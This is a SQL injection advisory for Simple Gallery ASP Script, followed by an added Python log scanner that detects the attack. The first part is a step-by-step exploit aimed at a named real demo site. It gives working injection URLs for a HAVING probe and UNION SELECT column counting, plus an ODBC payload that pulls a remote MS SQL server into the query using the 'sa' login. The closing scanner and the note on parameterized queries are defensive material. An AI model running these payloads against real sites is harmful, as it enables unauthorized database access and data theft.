Simple Gallery ASP Script suffers from a remote SQL injection vulnerability.
#################Simple gallery (pcat_id) SQL Injection Vulnerability#########################
#######By: e.wiZz! ew1zz@hotmail.com
#####Info: Bosnian Idiot FTW!
#####Site: infected.blogger.ba
#####Greetz: Luigi Auriemma,str0ke
In the wild....
######################################################################################
#####Project Name: Simple Gallery ASP Script
#####Site: preprojects.com
#####Vulnerability: SQL Injection
#####PoC on demo site :
http://www.preprojects.com/pgallery/gallery/
OK, we have the table "admin", but we need to find how many columns there are in order to extract something. We need to know at least one column to start, so let's find one :)
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 HAVING sum('inthewild')='inthewild'
We got photo_id. Let's find how many columns there are:
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id from admin
We got an error: The number of columns in the two selected tables or queries of a union query do not match. Try something else...
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id,null,null,null,null,null,null,null,null from admin
Response: No value given for one or more required parameters. So it's 9 columns. I won't continue with it.
Connect to a network-accessible MS SQL instance (heavy injection :)
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 UNION SELECT *
FROM [ODBC;DRIVER=SQL SERVER;Server=<serverinthewild>,<Port>;UID=sa;PWD=<PASSWORD>;
DATABASE=master].Information_Schema.Tables where '1'='1'or'bosnian'='idiot'
Almost a tutorial :)
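
Every request above carries its payload in pcat_id, a parameter that should only ever hold an integer, so the probing shows up plainly in web server logs. The following is an added example (not part of the original advisory) that flags such requests to category_photos.asp; the log layout, timestamps, client addresses and stage labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Integer-only parameters of category_photos.asp (assumed from the advisory's URLs).
NUMERIC_PARAMS = {"p", "pcat_id"}
# Markers for the stages the advisory walks through, most specific first.
STAGES = [
    ("odbc-remote-source", re.compile(r"\[\s*odbc\s*;", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("having-probe", re.compile(r"\bhaving\b", re.I)),
]
# Constructed sample log lines (W3C-style; field order is given in the #Fields header).
STEM = "/pgallery/gallery/category_photos.asp"
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    f"2024-01-01 10:00:00 192.0.2.10 GET {STEM} p=1&pcat_id=22 200",
    f"2024-01-01 10:00:05 192.0.2.66 GET {STEM} p=1&pcat_id=22+HAVING+sum('inthewild')='inthewild' 500",
    f"2024-01-01 10:00:09 192.0.2.66 GET {STEM} p=1&pcat_id=22+union+select+photo_id,null+from+admin 500",
    f"2024-01-01 10:00:14 192.0.2.66 GET {STEM} p=1&pcat_id=22+UNION+SELECT+*+FROM+[ODBC;DRIVER=SQL+SERVER] 500",
]

def classify(query):
    """Return (param, stage) for the first integer parameter whose value is not an integer."""
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() not in NUMERIC_PARAMS:
            continue
        value = unquote_plus(raw)
        if re.fullmatch(r"\d{1,9}", value):
            continue  # well-formed integer, nothing to report
        for stage, pattern in STAGES:
            if pattern.search(value):
                return name, stage
        return name, "non-numeric"
    return None

def scan(log_lines):
    """Return [(client_ip, param, stage)] for flagged requests to category_photos.asp."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue
        verdict = classify(fields[5])  # cs-uri-query
        if fields[4].lower().endswith("/category_photos.asp") and verdict:
            hits.append((fields[2], *verdict))  # c-ip, param, stage
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same integer check, applied in the page itself before pcat_id reaches the query, together with a parameterized query, removes the injection point.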